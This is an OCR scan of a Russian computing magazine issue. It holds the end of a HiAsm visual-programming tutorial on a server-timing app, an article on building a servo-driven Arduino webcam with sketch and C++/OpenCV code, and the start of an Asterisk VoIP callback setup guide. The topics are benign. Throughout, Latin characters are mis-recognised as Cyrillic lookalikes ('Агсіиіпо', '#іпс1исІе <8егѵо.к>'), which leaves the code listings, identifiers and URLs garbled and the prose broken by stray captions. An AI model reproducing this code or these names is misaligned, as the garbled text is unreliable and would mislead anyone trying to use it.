рые, пройдя через «Разветвитель», попали бы на сІоЗепсІ. В более 
сложных схемах всегда бывает по несколько возможных правильных 
вариантов включения элементов, решающих определенную задачу, и 
выбор какого-то одного из них будет зависеть от достигнутого компро- 
мисса между читабельностью схемы и ее размером. 

Убедившись, что схема работает, можно приступать к следующему 
этапу. 








Схема приложения тестирования сервера 
(шаг 2) 



І1(х < 100) 

[вызываем сІоЕѵегЩІ у хаба] 

еізе 

[вызываем боЗбор и счетчика времени] 



ЗАСТАВЛЯЕМ ВСЕ ЭТО РАБОТАТЬ. 

Удаляем элемент «Редактор текста» — он нам больше не нужен. 
Достаем с вкладки «Инструменты» элемент «Счетчик времени». С 
помощью него мы будем измерять время, которое ушло на соеди- 
нение с сервером, отправку запроса и получение данных. Для этого 
ставим счетчик между кнопкой и хабом (опСІіск-^ сІоЗіа гі и опЗТагІ; 

-> боЕѵепТІ], а его метод сІоЗіор соединяем с событием опЭІБСоппесІ: 
элемента «ТСР-клиент». При таком включении в тот момент, когда 
сервер закроет соединение с нашим приложением, произойдет 
событие опЭізсоппесІ:, которое и остановит счетчик. При этом изме- 
ренное время (то есть количество миллисекунд, которое прошло с 
момента вызова события сІоЗіа гі до момента вызова события сІоЗіор) 
будет выдано счетчиком в поток вместе с событием опЭіюр. Выведем 
содержимое потока с этого события, например, в элемент «Надпись», 
расположенный на вкладке «Интерфейс» (его лучше всего ставить в 
режиме Редактора форм]. В итоге получим схему, представленную на 
иллюстрации. После запуска приложения убеждаемся, что оно ото- 
бражает время одного запроса. 

Последнее, чего не хватает в схеме для выполнения нашей задачи 
— это отправка запроса 100 раз подряд. Для этого после наступления 
опЭізсоппесІ: нужно вызывать повторное подключение к серверу и 
отправку запроса до тех пор, пока это событие не произойдет сотый 
раз. В решении этой проблемы нам помогут два новых элемента, нахо- 
дящихся на вкладке «Логика». Это элемент «Арифметика», который 
умеет производить простые математические операции, и элемент 
«Условный блок», который умеет сравнивать между собой два про- 
извольных значения. Первым мы будем считать количество произо- 
шедших событий опОізсоппесІ, а вторым — сравнивать это количество 
с 100. Если номер итерации меньше 100, то программа продолжит 
запросы к серверу, в противном случае — отобразит время выполнения 
задачи. Для этого необходимо соединить элементы так, как показано 
на рисунке. Элемент «Арифметика» соединен сам с собой точками Орі 
и ВезиО, что позволяет в качестве первого аргумента использовать 
ранее вычисленное значение и, таким образом, вести счет вызо- 
ва события опОізсоппесЕ На простом языке программирования это 
можно было бы записать одной строкой: х = х + 1 . После вычисления 
следующего значения счетчика результат передается в поток вместе с 
событием опРезиК, которое соединено с методом боСотраге элемента 
«Условный блок». Его второй аргумент задан в свойствах и равен 100, 
то есть данный участок схемы эквивалентен следующему коду: 



Также можно заметить, что между счетчиком и надписью появил- 
ся еще один хаб со связью, идущей к точке боСІеаг элемента 
«Арифметика». При таком включении метод боСІеаг будет обнулять 
счетчик вызова событий опЭізсоппесІ: всякий раз после вывода 
времени на форму, что позволит нажимать кнопку отправки запросов 
несколько раз подряд без рестарта приложения. 

Еще один не столь приметный элемент в виде стрелки, который 
появился на последнем рисунке, расположен между событием 
опЭіагІ: счетчика времени и методом боЕѵепІІ хаба. Этот элемент 
по своему назначению почти полностью эквивалентен элементу 
«Разветвитель», с той лишь разницей, что у него может быть всего 
три входящих потока и один исходящий. Он автоматически ставится 
на схему в тот момент, когда ты тянешь связь от точки элемента (от 
опОізсоппесІ, к примеру] и сбрасываешь ее на уже существующую 



ОСНОВНЫЕ ЭЛЕМЕНТЫ 



Ниже привожу несколько основных элементов, без которых не 
обходится почти ни одна схема. 

Инструменты: 

Разветвитель(НиЬ) — позволяет смешивать несколько парал- 
лельных потоков в один или разветвлять один поток на несколь- 
ко последовательных. 

Поток-данные(ОоОаІа) — позволяет помещать произвольные 
данные в поток. 

Память(Метогу) — позволяет сохранять данные из потока для 
последующего использования. 

Логика: 

Арифметика(МаЛі) — позволяет выполнять простые математи- 
ческие операции. 

Условный блокШ_е1зе) — позволяет сравнивать два значения 
между собой. 

Цикл со счетчиком(Рог) — позволяет заданное число раз 
выполнить схему, идущую после него. 

Контролы -> Таймер(Тітег) — позволяет выполнять кусок схемы 
через определенные интервалы времени. 

Помощники -> Отладка(ОеЬид) — позволяет в запущенной про- 
грамме отслеживать выполнение методов и событий, а также 
просматривать данные из потоков. 
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Среда для графического проектирова- 
ния приложений — НіАзт 



связь между двумя другими точками. Последний штрих в 
нашей схеме — размещение плашек-комментариев для 
большей наглядности происходящего. Это ведь тоже код, 
хоть и графический, а любой код нужно комментировать. 

КОГДА ЭТО МОЖНО ИСПОЛЬЗОВАТЬ? 

Вот так просто мы создали несложное, но полезное сете- 
вое приложение. Собственно, в этом и заключается глав- 
ное достоинство НіАзт (ради которого, собственно, и был 
создан конструктор) — в возможности собирать свои соб- 
ственные программы без знания каких-либо языков про- 
граммирования. Поскольку в НіАзт приложение строится 
из готовых блоков и связей между ними, то понятия «син- 
таксическая ошибка», как такового, тут нет — при любом 
расположении и соединении элементов схема будет 
скомпилирована и запущена. Будет ли она при этом рабо- 
тать — это уже совсем другой вопрос :). Часть элементов 
палитры реализует уже готовый функционал для выпол- 
нения конкретной часто встречающейся задачи (скажем, 
для закачки файла из интернета и сохранения его на 
диске), за счет чего многие схемы в НіАзт создаются за 
гораздо меньшее время, чем аналогичные программы в 
других языках и средах программирования. Если же гото- 
вого элемента нет, то велика вероятность того, что нужная 
схема (или близкая к ней) уже есть в примерах, и пользо- 
вателю останется только слегка изменить ее. 

Но, как это часто бывает, все недостатки конструктора 
вытекают из его достоинств. Так, отсутствие необходи- 
мости в знании языка программирования совершенно 
не исключает необходимость в знании основ работы 
операционной системы, сетевых протоколов, форматов 
и стандартов, математики и физики, то есть основ той 
предметной области, для которой создается програм- 
ма. Иногда это является неожиданным сюрпризом для 
пользователя, который с самого начала привык получать 
готовое решение в два клика без заморочек с хелпом и 
прочими доками. 

Отсутствие каких-либо ограничений на расположение и 
связывание элементов выливается в то, что схему из 10 
кубиков можно легко превратить в хаос, с ходу разобрать- 
ся в котором не сможет даже опытный разработчик. Не 
исключены также схемы со множеством лишних связей 
и элементов, которые никак не влияют на работу про- 
граммы, но оставлены в ней только потому, что «и так все 




Схема приложения тестирования 
сервера (шаг з) 



работает». Это, однако, не означает, что такого не бывает 
в обычных языках — просто визуальное конструирование 
к этому располагает в гораздо большей степени. 

Если задача пользователя достаточно сложна и не укла- 
дывается в рамки стандартных элементов палитры, то ее 
реализация, как правило, получается более громоздкой, 
чем при использовании обычного языка программирова- 
ния. Происходит это из-за того, что качество и простота 
схемного решения обратно пропорциональны сложности 
элементов, из которых строилось приложение. Например, 
простая математическая формула, реализованная 
несколькими кубиками, является менее наглядной, чем 
аналогичная запись в текстовом виде хотя бы потому, что 
занимает на экране больше места. 

Производительность получаемого приложения в пакете 
ѴѴі псіоѵѵз (именно он рассматривается в данной статье) 
хоть и сильно зависит от используемого набора эле- 
ментов, но все же в среднем ниже производительности 
аналогичного решения на компилируемом языке про- 
граммирования. 

МАЛЕНЬКИЙ СОВЕТ 

НіАзт идеально подходит для конструирования простых 
утилит. Но при этом, как и любой другой механизм гра- 
фического программирования, не годится для решения 
задач, в которых требуется производить много расчетов, 
сравнений, операций со строками и прочих «микро» про- 
цедур. 

Помимо этого есть другое ограничение, связанное с мак- 
симально возможной сложностью проекта, для которого 
в качестве среды разработки выгодно выбирать НіАзт. 
Несмотря на то, что в палитре пакета есть множество 
инструментов для масштабирования схемы (разбивка 
на модули, вкладывания в контейнеры и т.д.) , начиная с 
определенного момента дальнейшее наращивание функ- 
ционала (и, как следствие, количества элементов) ведет 
к сильному падению читабельности схемы и пониманию 
ее работы из-за образования большого числа связей. Это 
значит, что для разработки более-менее сложных прило- 
жений конструктор программ не подходит. Могу дать сле- 
дующий совет: если ты считаешь, что схема приложения 
будет состоять из примерно 500-1000 элементов, то лучше 
обратиться к традиционным средам программирования. 
Впрочем, точная цифра целиком и полностью зависит от 
самого разработчика: так, например, официальный сайт и 
форум НіАзт «нарисован» в нем самом и состоит из при- 
мерно 7000 элементов . “г 
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Проект НіАзт (или 
Конструктор про- 
грамм) — это открытое 
программное обе- 
спечение, разрабаты- 
ваемое сообществом 
русских программи- 
стов, известных под 
никами бііта (Дми- 
трий Власов, ведущий 
проекта), пезсо (Евге- 
ний Носов), іагзрісіег 
(Иван Разумов), піс 
(Николай Березников) 
идругие. Неоценимый 
вклад в развитие 
проекта вносят и про- 
стые пользователи, 
регулярно посещаю- 
щие форум и пред- 
лагающие идеи, часть 
которых реализуется в 
последующих версиях 
конструктора. 
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• Блог по НіАзт: 
Ы-азт.ЫодзроЕсот 

• Уроки визуального 
программирования: 
ту-Ыазт.пеЕги 

• НіАзт опііпе: 
Ыоп.Ыазт.со 
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Совмещаем простой код и железо 
с помощью Агсіиіпо 



Если ты всю жизнь завидовал гикам из американских фильмов, которые из 
всякого хлама ловко делают роботов или системы контроля доступа, - настал 
твой час. Когда писать обычные программы надоедает, а хочется, чтобы код за- 
ставил работать что-то физическое, путь даже робота на столе, пора переходить 
в другую лигу. Можно начать с физики и узнать, чем отличается транзистор от 
конденсатора, а можно сразу купить контроллер Агсіиіпо и действовать. 



Программирование микроконтроллеров на базовом уровне — не такая 
уж и сложная вещь. Если ты внимательно читал замечательные статьи 
во «Фрикинге» по этой теме, то должен отлично это понимать. И все- 
таки, чтобы сделать что-то действительно стоящее, придется немало 
попыхтеть, изучить множество материала, попробовать полученные зна- 
ния в деле, и только потом получить какой-то осязаемый результат. Но, к 
счастью, есть вариант создать работающий девайс здесь и сейчас самой 
малой кровью. И в этом нам поможет замечательная разработка — кон- 
троллер Агсіиіпо. Разбираться в его основах было бы чрезвычайно скуч- 
но, поэтому мы не будем долго размусоливать теорию, а сразу покажем 
его в действии. Задача — проапгрейдить обычную веб-камеру, снабдив 
ее возможностью поворачиваться в нужном направлении по нашей 
команде. Приступим? 

НТО ТАКОЕ АШІМ? 

Девайс, который мы выше назвали Агсіиіпо, представляет собой про- 
стую и удобную плату ввода/вывода со встроенной средой разработки на 
языке специальном языке ѴѴігіпд. Прелесть в том, что язык этот фактиче- 
ски является С++, поэтому нет никакой необходимости осваивать набор 
программ контроллера и фактически писать программу на ассемблере. 
Плата Агсіиіпо состоит из микроконтроллера АТтеда328 или АТтеда168 



и небольшой элементной обвязки для программирования и интеграции с 
другими схемами. На каждой плате обязательно присутствуют линейный 
стабилизатор напряжения 5 В для питания микроконтроллера и 16 МГц 
кварцевый резонатор, задающий тактовую частоту работы микрокон- 
троллера (М К). Все эти данные — лишь для общего развития. Нам важно 
знать другое. В микроконтроллер предварительно прошивается загруз- 
чик (бутлоадер), это значит, что внешний программатор не нужен, и про- 
шивка пользовательских программ (так называемых скетчей) произво- 
дится из Агсіиіпо ЮЕ нажатием одной кнопки. «В чем фишка?», — спро- 
сишь ты. Суди сам: чтобы залить (прошить) программу в большинство 
микроконтроллеров требуются специальные устройства — программато- 
ры. Для разных МК и других нужд существует куча программаторов — от 
специализированных (шьет только АѴП) до универсальных (шьет все), от 
простых (7 проводков от ЕРТ-порта к ножкам МК) до сложных (часто и 
сами они построены на МК). Общая проблема программаторов в том, что 
их надо где-то взять (купить, взять у товарища, спаять самому). А теперь 
почувствуй разницу: для Агсіиіпо программатор не нужен. Прошивка 
может заливаться в нее через обычный ІІ5В-шнурок. Более того, саму 
Агсіиіпо можно использовать как программатор и шить ею другие МК! 
Питаться Агсіиіпо может как от внешнего постоянного напряжения 9-1 2В 
(то есть запитать ардуину можно от блока питания компьютера или 
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Классическая плата Агсіиіпо - наша отправная 



ноутбука, батареек или аккумуляторов], так и от ІІЗВ-порта компьютера. 
Короче говоря, чтобы начать работать с микроконтроллером, нужна 
только сама плата и П5В-шнуроктипа А-В, которым к ПК подключаются 
принтеры. 

ВЗЯТЬ И СДЕЛАТЬ 

Освоить работу с микроконтроллером можно буквально за один вечер. 
Для этого нужно понимать несколько вещей. Агсіиіпо — это плата ввода/ 
вывода. Нам доступны 14 цифровых вводов/выводов и шесть аналоговых 
входов. К этим выводам подключаются многие другие девайсы, вроде 
моторчиков, датчиков и т.д. С их помощью мы можем передавать коман- 
ды или наоборот получать какие-то данные. Если не вдаваться в подроб- 
ности, то цифровые порты Агсіиіпо позволяют работать с логическими О 
и 1. Аналоговые входы позволяют считывать значение напряжение на 
порту с точностью до 5 мВ. Это первое, что надо запомнить. 

Но без программы микроконтроллер — это не более чем бесполезная 
железка. Для того, чтобы он начал выполнять какие-то задачи, его необ- 
ходимо программировать. Это второй момент. Программировать Агсіиіпо 
можно как из родной среды — специальной Агсіиіпо ЮЕ, которая исполь- 
зует язык ѴѴігіпд (по сути, это обычный С++], так и через популярную 
среду программирования микроконтроллеров семейства АѴР — ѴѴіпАѴП. 

В последнем случае код необходимо писать на чистом С. 

Простота в освоении Агсіиіпо привлекает новичков, вызывают него- 
дование у профессиональных программистов микроконтроллеров. 
Разумеется, как и в любом холиваре, здесь есть своя правда у обеих 
сторон. Документация на Агсіиіпо доступна на официальном сайте 
Агсіиіпо ( ѵѵѵѵѵѵ.агбиіпо.сс ). Помимо этого под открытой лицензией распро- 
страняется и схема микроконтроллера, поэтому у оригинального Агсіиіпо 
существует множество клонов. Само название Агсіиіпо является торговой 
маркой, и поэтому все платы-клоны называются иначе (хотя и имеют 
в своем названии «сіиіпо») : например, Егеебиіпо, Зеесіиіпо или отече- 
ственный аналог — СгаІЮиіпо. Приобрести оригинальную плату Агсіиіпо 
можно, например, в Итихсепіег ( ѵѵѵѵѵѵ.ІіпихсепІег.ги/зЬор/еппЬесІсІесІ/ 
агсіиіпо ) или, если хочешь сэкономить, в каком-нибудь западном 
интернет-магазине (скажем, ѵѵѵѵѵѵ.зрагкіюп.сопп ). Цена вопроса — от $30. 

ДОПОЛНИТЕЛЬНЫЕ ШИЛДЫ 

Впрочем, прелесть Агсіиіпо не заканчивается в простоте подключения 
и легкости программирования под него. Огромное число энтузиастов 
пишут для микроконтроллера программные библиотеки — своего рода 
модули, которые ты можешь подключить к своей программе. В резуль- 
тате, всего несколькими строчками кода можно управлять сервома- 
шинками, взаимодействовать с компьютерной клавиатурой/мышкой и 
т.д. Более того, для Агсіиіпо разрабатываются так называемые шилды 
— платы-дополнения (модули, только аппаратные], которые невероятно 
расширяют возможности контроллера. Например, ЕіЬегпеІ-шилд позво- 
ляет подключить Агсіиіпо к компьютерной сети и даже работать в интер- 




Сервопривод стоимостью Схема подключения сев 
$5 ров к Агсіиіпо 



нете (клиентом или сервером]. Есть ОЭМ-шилд для взаимодействия с 
сотовой сетью, ОРЭ-шилддля взаимодействия с ОРЭ-приемниками, 
ѴѴі-Еі-шилд для работы с беспроводными сетями и т.д. Все это дает 
невероятную возможность на простой платформе создавать сложные и 
хитроумные девайсы. По сути, Агсіиіпо превращается в конструктор для 
быстрого прототипирования и воплощения в жизнь самых безумных 
идей, не требующий при этом паяльник. Любая возможность автомати- 
зировать что-то с легкостью реализуется с Агсіиіпо! Выкладывать ритм 
сердцебиения в ТѵѵіЛег? Или через инет удаленно включить полив цве- 
тов? Легко! Автоматизация аквариума, элементы умного дома, кодовый 
замок или, наоборот, цифровая отмычка в виде универсального ключа 
— все это возможно с помощью Агсіиіпо. Мы же сегодня попробуем еще 
одну отрасль, в которой так силен микроконтроллер — робототехнике. 



УПРАВЛЯЕМАЯ КАМЕРА 

Чтобы не быть голословным, попробуем взять вполне полезную задачу. 

В нашем распоряжении есть веб-камера и Агсіиіпо. Условие — сде- 
лать управляемую камеру и управлять углом ее обзора с компьютера. 
Приводить в движение мы ее будем с помощью так называемых серво- 
приводов. Вообще для движения камеры можно было бы использовать 
специальные моторчики. Но чтобы управлять обычными моторчиками, 
Агсіиіпо, как и любому контроллеру, требуется силовой модуль (так 
называемый драйвер). Зачем он нужен? Дело в том, что токи, кото- 
рыми может управлять микроконтроллер, очень малы (не более 40 мА 
на порт]. Любым же исполнительным устройствам типа моторчиков 
требуются для работы токи намного большие. И если подключить их 
напрямую к МК, то он просто сгорит. Поэтому и получается, что напря- 
мую к портам Агсіиіпо можно подключать только обычные светодиоды 
(да и те нужно включать через токоограничительный резистор). Обычно 
в роли такого драйвера выступает микросхема Е2930 (именно на базе 
этой микросхемы построен Моіюг-шилд — дополнительная плата, под- 
ключаемая кАрдуино и позволяющая управлять двумя моторчиками]. 
Это сложно. Зато помимо моторчиков приводить в движение легкую 
камеру можно еще и с помощью сервомашинок. Сервомашинка — это 
мото-редуктор, способный поворачивать выходной вал на заданный 
угол и удерживать его в этом положении. Плюс сервы в том, что ника- 
ких дополнительных модулей для управления не требуется, и кроме 
того, их можно подключать к Агсіиіпо напрямую. Разумеется, питать 
сервомашинки (особенно мощные] лучше от отдельного источника, но 
маломощную и самую дешевую 50-90 можно подключать прямо к 115В. 
Приобрести сервомашинки можно опять же в любом интернет-магазине 
электроники по $5 за штуку. 



КАК УПРАВЛЯТЬ СЕРВОПРИВОДОМ? 

Вообще, сервоприводы нужны в первую очередь, моделистам, для 
управления положениями закрылок, рулей и вертолетных лопастей. 

Вал мотор-редуктора жестко связан с движком переменного резистора. 
Резистор подключен в схему контроля и своим текущим сопротивлением 
сообщает о текущем положении вала. На схему контроля поступают 
сигналы управления, сообщающие, в какое положение нужно повернуть 
выходной вал (и резистор соответственно]. Схема подает питание на 
моторчик и крутит им до нужного угла (сопротивления резистора), там 
замирает и, если что-нибудь повернет вал из нужной точки, вернет ее 
на место. При этом управлять сервой очень просто — у нее есть три про- 
вода: 
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Программа для управления ОрепСѴ - глаза для робота 

камерой 




Компиляция завершена 



ы.«ііі^ьг>. ПР 



■ПѴТ?, *л і ► ь|Р| | 



Прошивка залита 



• земля (коричневый/черный), 

• питание +5 вольт (красный), 

• сигнальный (оранжевый/желтый/белый). 

Управление импульсное, по сигнальному проводу. Особая прелесть 
состоит в том, что сигнальный провод слаботочный — импульсы можно 
давать непосредственно с ноги микроконтроллера. Чтобы удерживать 
определенную позицию — импульс должен повторяться. Все это может 
звучать сложно, но на деле довольно просто. Задача упрощается еще 
и потому, что в комплекте штатных библиотек Агбиіпо ЮЕ уже есть 
библиотека Зегѵо для управления сервомашинками [ ѵѵѵѵѵѵ.агбиіпо.сс/еп/ 
Реіегепсе/Зегѵо ). В результате очень просто можно набросать код, кото- 
рый заставит серву делать поворот от 0 до 1 80 градусов и обратно: 

#іпс1исІе <8егѵо.к> 

Зегѵо шузегѵо; // создаем объект для контроля сервы 
// максимальное количество таких объектов — 8 
іпб роз = 0; 

// переменная для хранения позиции сервы 
ѵоіб зебир ( ) 

{ 

шузегѵо . аббаск ( 9 ) ; / / серва подключена к девятому пину 

} 

ѵоіб Іоор ( ) 

{ 

бог (роз = 0; роз < 180; роз += 1) 

// от 0 до 180 градусов 
{ 

// с шагом в 1 градус 
шузегѵо .ѵпгібе (роз) ; 

// устанавливаем положение 
беіау (15) ; 

// ждем 15 мс пока серва займет новое положение 

} 

// и обратно 

бог (роз = 180; роз>=1; роз-=1) 

// от 180 до 0 градусов 
{ 

шузегѵо .ѵпгібе (роз) ; 
беіау (15) ; 

} 

} 

ПИШЕМ ПРОГРАММУ ДЛЯ АШІМ 

Для того, чтобы управлять камерой, нам понадобится две сервома- 
шинки. На качалку первой сервомашинки прикрепим веб-камеру, 
которая будет отвечать за высоту (широту) поворота камеры. Теперь 
закрепим первую серву на качалке второй — она отвечает за ази- 
мутальный угол поворота. То, что у меня получилось, можно увидеть 



на картинке. Схема управления очень проста. Берем Агбиіпо или 
аналог (в моем случае — СгакЮиіпо) и просто подключаем сервома- 
шинки напрямую к плате по схеме, приведенной на картинке. То есть 
управляющий выход одной сервы подключаем к седьмому порту, а 
другой — к восьмому. Вот и все :). 

С механикой разобрались, осталось собрать схему управления и напи- 
сать две программы: одна для Агбиіпо, а второй будет управляющая 
программа для ПК. В нашем случае углы поворота сервомашинок мы 
будем передавать по последовательному порту с управляющей про- 
граммы на ПК. Агбиіпо просто должна получить значение угла пово- 
рота и повернуть нужную серву на заданный угол. Как я уже сказал, 
для работы с сервомашинками есть готовая библиотека Зегѵо (идет 
в составе Агбиіпо ЮЕ). Для взаимодействия с программой на ПК мы 
тоже не будем выдумывать свой велосипед, а воспользуемся готовой 
библиотекой Рігтаба, которая, также как и библиотека Зегѵо, уже входит 
в стандартный набор библиотек Агбиіпо ЮЕ. Еігтаіа — это протокол, 
позволяющий простым образом общаться программе на контроллере 
Агбиіпо с программами на компьютере. В результате недолгих экспери- 
ментов у меня получился следующий код для Агбиіпо, который я по ходу 
поясню в комментариях: 

#іпс1ибе <Рігтаба.к> 

#іпс1ибе <8егѵо.к> 

Зегѵо зегѵо7; // объекты класса Зегѵо 
Зегѵо зегѵо8; // для работы с сервомашинками 

// функция, обрабатывающая аналоговые сообщения 
Рігшаба 

ѵоіб апаІодѴкгібеСаІІЪаск (Ъубе ріп, іпб ѵаіие) 

{ 

іб (ріп == 7) 

зегѵо7 .ѵнгібе (ѵаіие) ; 

// поворачиваем серву на угол ѵаіие 
І1(ріп == 8) 

зегѵо8 .ѵнгібе (ѵаіие) ; 

} 

ѵоіб зебир ( ) 

{ 

// устанавливаем версию протокола 
Рігшаба . зебРігпмагеѴегзіоп ( 0 , 2 ) ; 

// задаем функцию- обработчик сообщений 

Рігшаба . аббасЬ (АЫАЬОС_МР88АСЕ , апаІодМгібеСаІІЪаск) ; 

зегѵо7 . аббаск ( 7 ) ; 

// указываем порт подключения сервы 
зегѵо8 . аббаск ( 8 ) ; 

Рігшаба . Ьедіп (9600) ; 

// инициализация библиотеки Рігшаба 
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Выбираем порт 



} 

ѵоісі Іоор ( ) 

{ 

ѵЛііІе (Рігтаба . аѵаіІаЫе ( ) ) 

// если есть сообщения 

Рігтаба.ргосеззіприб () ; 

// запускаем функции -обработчики 

} 

Теперь этот несложный код компилируем и заливаем 
получившуюся программу в Агсіиіпо. Для этого необходимо 
запустить Агсіиіпо ЮЕ, выбрать свою версию платы через 
меню «Тооіз -> Воагб», затем указать порт, к которому она 
подключена («Тооіз Зегіаі Рог!»], вставить код и нажать 
на кнопку компиляции. После завершения компиляции в 
строке состояния появится сообщение «йопе сотріііпд». 
Остается только нажать кнопку «Загрузить скетч в Агсіиіпо», 
и программа начнет прошиваться в МК. Если все про- 
шло хорошо, загрузка завершается сообщением «Оопе 
ирІоасІІіпд».Ура, механика и электроника готовы! Осталось 
написать программу для управления этим мини-роботом. 

УПРАВЛЯЮЩАЯ ПРОГРАММА 

Разработать программу для ПК ты можешь на любом удоб- 
ном для тебя языке программирования, но я выбрал С++. 

Так как в дальнейшие планы входит научить этого мини- 
ѵѵеЬ-сат-бота самостоятельно обнаруживать объекты и 
следить за ними, то для работы с камерой я воспользуюсь 
библиотекой ОрепСѴ ( зоигсеЬгде.пеі/ргоіесіз/орепсѵІіЬгагу ). 
Это открытая библиотека компьютерного зрения, которая до 
первой версии разрабатывалась в Центре разработки про- 
граммного обеспечения Іпііеі (причем российской командой 
в Нижнем Новгороде). Фактически, ОрепСѴ — это набор 
данных, функций и классов для обработки изображений 
алгоритмами компьютерного зрения. Эта библиотека очень 
популярна за счет своей открытости и возможности бесплат- 
но использовать как в учебных, так и коммерческих целях. 
Идея нехитрая: подключаемся к веб-камере и показываем 
то, что она «видит». Также выведем в окошко с картинкой 
пару ползунков, с помощью которых будем управлять поло- 
жением сервомашинок. Так как в моей конструкции робота 
веб-камеру пришлось закрепить на боку, то в программе 
приходится это исправлять (поворачивать картинку на 90 
градусов против часовой стрелки). Эта процедура реали- 
зуется функцией гоІаЫ), являющейся оберткой вокруг функ- 




Веб-камера на двух сервоприводах 



ции ОрепСѴ: сѵѴѴагрАШпеО, которая и выполняет поворот 
изображения. Полный код программы ты найдешь на диске, 
а здесь я приведу только функцию-обработчик, который 
считывает положение ползунков в управляющей программе 
и отправляет их в качестве команды на микроконтроллер: 

// положение первой сервы 

іпб А = 0 ; 

іпб Атах = 180; 

// положение второй сервы 

іпб Р = 0; 

іпб Ртах = 180; 




> СІѴСІ 

Исходники про- 



шивки для Агсіиіпо 
и программы на С++ 
ты найдешь на дис- 
ке. Их также можно 
скачать из инета 
( гоЬосгаІТ.ги/ІІІез/ 
орепсѵ/зегѵоЬоі/ 
зегѵоЬоі.гір ). 



лІЬі 



1 НТТР://ѴѴѴт1 



т 

> Ііпкз 



• Документация по 
Агсіиіпо: 
ѵѵѵѵѵѵ.агсіиіпо.сс 

• Блог по компью- 
терному зрению: 
гоЬосгаЖги/Ыод/ 
сотриіегѵізіоп 

• ѴѴІпАѴР: 
зоигсеіюгде.пе!/ 
ргоіеФзЛл/іпаѵг 

• Сообщество люби- 
телей Агсіиіпо в ЖЖ: 
соттипКу. 
Ііѵещигпаі.сот/ 
ги_агбиіпо 



ІрІІтаде* безб = 0; 

// 

// функции- обработчики ползунков 
// 



ѵоіб туТгаскЬагА ( іпб роз) { 



А = роз; 

// Рігтаба 



сйаг Ьиб[3]; 

Ьиб [ 0] = 0хЕ0 I 7; 

Ьиб [ 1] = А & 0x7 Р ; 

Ьиб[2] = (А » 7) & 0x7 Р ; 
зд.8епб(ЬиР, 3); 

Зіеер (100) ; 



Вот, собственно, и все. Теперь момент истины. 

Компилируем код, пробуем его запустить, двигаем ползун- 
ки. Сервоприводы издают звук, и — да, камера двигается! 
Работает! Если у тебя возникнет желание повторить подоб- 
ный опыт, то на освоение всей платформы у тебя едва ли 
уйдет больше одного вечера. Каких-то несколько часов — и 
ты уже можешь создавать работающие девайсы. Бывалые 
фрикеры, возможно, скажут, что Агсіиіпо годится разве что 
для новичков. Но даже если так, то что? Главное, что через 
минимальное время ты можешь получить результат, т 



ХАКЕР 10 /141/ 10 



► 033 






■ ■ Алексей «Аддге 550 г» Соколов 




Поднимаем систему обратного дозвона 
СаІІЬаск 



Самый верный способ сэкономить на звонках - использовать ІР-телефонию. 

Но, к сожалению, даже если установить на мобильный телефон какой-нибудь 
Зкуре-клиент, ты сможешь использовать его только при наличии ѴѴі-Гі или 36. 
Чтобы обойти эту привязанность к интернету, можно организовать систему 
саІІЬаск, которая будет звонить обоим абонентам по ѴоІР и связывать их между 
собой. В этом случае нет необходимости ни в интернете, ни в продвинутом теле- 
фоне, ни даже в ѴоІР-клиенте. 



Система саІІЬаск существует давно и предлагается многими ѴоІР- 
компаниями. Можно зайти на сайт, ввести два номера телефона, и 
специальный сервис позвонит обоим абонентам, чтобы соединить их 
между собой. Я даже пользовался когда-то этим с мобильного телефона, 
открывая страницу такого сервиса в веб-браузере. Этим можно вос- 
пользоваться разок где-нибудь за границей в роуминге, но использовать 
постоянно — нет. Совсем другое дело — организовать удобный сервис 
саму. Схема такая: ты звонишь на определенный номер, где установлен 
специальный сервер, тот сбрасывает звонок и сам перезванивает. Тебе 
остается набрать специальный РІІМ-код (выполнить авторизацию] и 
номер для звонка, после чего дожидаться соединения. Это называется 
обратным звонком, или саІІЬаск’ом. Штука удобная и довольно простая в 
организации. 

МИНИ-АТС 

Если при слове «Мини-АТС» у тебя возникает ассоциация с жутко 
дорогостоящим оборудованием, которое устанавливается в офисах, 
оно ошибочно. Помимо аппаратных АТС’ок, огромное распростране- 
ние получили программные продукты, в том числе бесплатный сервер 
АзТегізк. Собственно, АзТегізк будет сердцем нашей системы. Про базо- 
вую установку сервера и первичную настройку, чтобы все заработало, у 



нас были две статьи. РЭЕ-версии ты найдешь на диске, а также можешь 
прочитать их на сайте [ ѵѵѵѵѵѵ.хакер.ги/тадагіпе/ха/І 07/1 52/1 .азр и ѵѵѵѵѵѵ. 
хакер.ги/тадагіпе/ха/1 08/1 54/1 .азр ). Я не рекомендую использовать для 
наших целей сборки типа ТгіхВох, Еіазбх и т.д. ; проще будет установить и 
настроить все вручную. Но повторять то, о чем мы писали отдельные ста- 
тьи, я сейчас не буду. Итак, предположим, что Азіегізк у нас есть. Первое, 
что нужно сделать — это купить и зарегистрировать на Азіегізк местный 
городской номер, который отдается по 51 Р. На него мы будем звонить. 
Можно, конечно, не покупать 5ІР-номер, а использовать обычный ана- 
логовый, который приходит по меди. Но тогда придется докупить ѴоІР- 
шлюз с ЕХО-портом, а с ним могут возникнуть проблемы: на древних и 
не очень древних АТС не всегда работает определение Саііег Ю, которое 
нам очень нужно. Да и вообще, дополнительное звено в цепочке только 
понизит надежность системы. По этой причине 5ІР-номер, безусловно, 
предпочтительнее. Следующий шаг — покупка (и настройка) аккаунта 
у ѴоІР-провайдера, через который мы будем звонить. Можно купить 
несколько и при звонках за рубеж использовать один, в Москву — другой, 
по России — третий. Выбор большой. Еще пара замечаний. В качестве 
номера можно использовать свой сотовый номер, только для подклю- 
чения его кАзІегізк потребуется ѴоІР-С5М шлюз, а они стоят дорого: 
примерно от 5000 рублей за порт. Есть обходной путь — использовать для 
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этого 30-модем, стоимость которого не превышает 1000 рублей. Для сото- 
вого телефона желательно прикупить любой 5ІМ Оіаіег, который позволит 
пользоваться такой схемой звонков максимально удобно — по сути, зво- 
нящему нужно будет только выбрать контакт в записной книге, а звонок и 
запрос к саІІЬаск-системе будет произведен автоматически. Стоит такая 
штука копейки, а подключается прямо к5ІМ-карте (смотри картинку]. 

ОБРАБОТКА ЗВОНКОВ 

Теперь, когда все приготовления выполнены, АзТегізк настроен по 
инструкциям из статей, можно приступать к организации нашего сервиса. 
И начнем мы с того, что поменяем так называемый контекст. Для этого 
открываем на Астериске файл /еТс/азТегізк/ехТепзіопз.соп} (в этом файле 
описывается план набора, то есть как будут себя вести все входящие 
и исходящие вызовы] и находим контекст, в который приходят все вхо- 
дящие извне звонки: у меня он называется [бготдогосі]. При входящем 
звонке система будет определять номер звонящего, и, если он есть в 
«списке», звонок будет отправляться на голосовое меню (ІѴР), в котором 
будет предложено набрать РІІМ-код, а далее — номер для звонка. Пусть 
